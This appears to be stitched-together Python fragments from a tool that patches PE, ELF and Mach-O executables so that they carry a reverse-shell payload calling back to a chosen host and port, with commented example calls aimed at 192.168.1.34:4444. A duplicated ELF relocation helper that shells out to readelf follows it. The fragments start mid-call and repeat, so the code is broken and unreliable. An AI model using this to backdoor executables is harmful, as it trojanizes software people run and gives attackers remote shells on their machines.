".old", #options.SUFFIX
False, #options.DELETE_ORIGINAL
False, #options.CAVE_MINER
"ALL", #options.IMAGE_TYPE
True, #options.ZERO_CERT
False, #options.RUNAS_ADMIN
True, #options.PATCH_DLL
"automatic", #options.PATCH_METHOD
None, #options.SUPPLIED_BINARY
False, #options.XP_MODE
False, #options.IDT_IN_CAVE
False, #options.CODE_SIGN
)
elif self.choice is "ELF":
supported_file = elfbin(
self.FILE,
None,
"REVERSESHELLNAME",
self.HOST,
self.PORT,
False,
False,
options.SHELL_LEN, #I must learn this
None,
"ALL")
elif self.choice is "MACHO":
supported_file = machobin(
self.FILE,
None,
"REVERSESHELLNAME",
self.HOST,
self.PORT,
False,
None,
options.FAT_PRIORITY, #Special settings for macho files
options.BEACON)
print("\n\n")
result = supported_file.run_this()
print("File {0} created !\n\n".format(supported_file.OUTPUT))
#start("PE", "Handle.exe", "192.168.1.34", 4444).patch()
#start("ELF", "Handle.exe", "192.168.1.34", "4444").patch()
#start("MACHO", "Handle.exe", "192.168.1.34", "4444").patch()
2. Get offset of LOAD from segment table
3. Return addr - offset
"""
cmd = "readelf -l {0} | grep LOAD | tr -s ' ' | cut -d ' ' -f 4".format(elf)
tmp = run_cmd(cmd)
vaddr = tmp.split('\n')[0]
cmd = "readelf -l {0} | grep LOAD | tr -s ' ' | cut -d ' ' -f 3".format(elf)
tmp = run_cmd(cmd)
offset = tmp.split('\n')[0]
return int(vaddr,16) - int(offset,16)
if __name__ == '__main__':
from elfbin import elfbin
elfp = elfbin(sys.argv[1]) #object file
text_base = elfp.get_section_offset(".text")
#print ".text offset:{0:#x}\n".format(text_base)
unsolved = get_relocate_text(sys.argv[1])
print unsolved
funcs = parse_text_section(sys.argv[1])
output = "{0}.fixed".format(sys.argv[1])
src = sys.argv[1]
for s in unsolved:
addr = get_func_addr(sys.argv[2],s['name'])
if addr == None:
print "%s can not be solved"%(s['name'])
continue
print "{0}->{1:#x}\n".format(s['offset'],addr)
write_elf(src,output,text_base + s['offset'],addr)
cmd = "readelf -l {0} | grep LOAD | tr -s ' ' | cut -d ' ' -f 4".format(
elf)
tmp = run_cmd(cmd)
vaddr = tmp.split('\n')[0]
cmd = "readelf -l {0} | grep LOAD | tr -s ' ' | cut -d ' ' -f 3".format(
elf)
tmp = run_cmd(cmd)
offset = tmp.split('\n')[0]
return int(vaddr, 16) - int(offset, 16)
if __name__ == '__main__':
from elfbin import elfbin
elfp = elfbin(sys.argv[1]) #object file
text_base = elfp.get_section_offset(".text")
#print ".text offset:{0:#x}\n".format(text_base)
unsolved = get_relocate_text(sys.argv[1])
print unsolved
funcs = parse_text_section(sys.argv[1])
output = "{0}.fixed".format(sys.argv[1])
src = sys.argv[1]
for s in unsolved:
addr = get_func_addr(sys.argv[2], s['name'])
if addr == None:
print "%s can not be solved" % (s['name'])
continue
print "{0}->{1:#x}\n".format(s['offset'], addr)
write_elf(src, output, text_base + s['offset'], addr)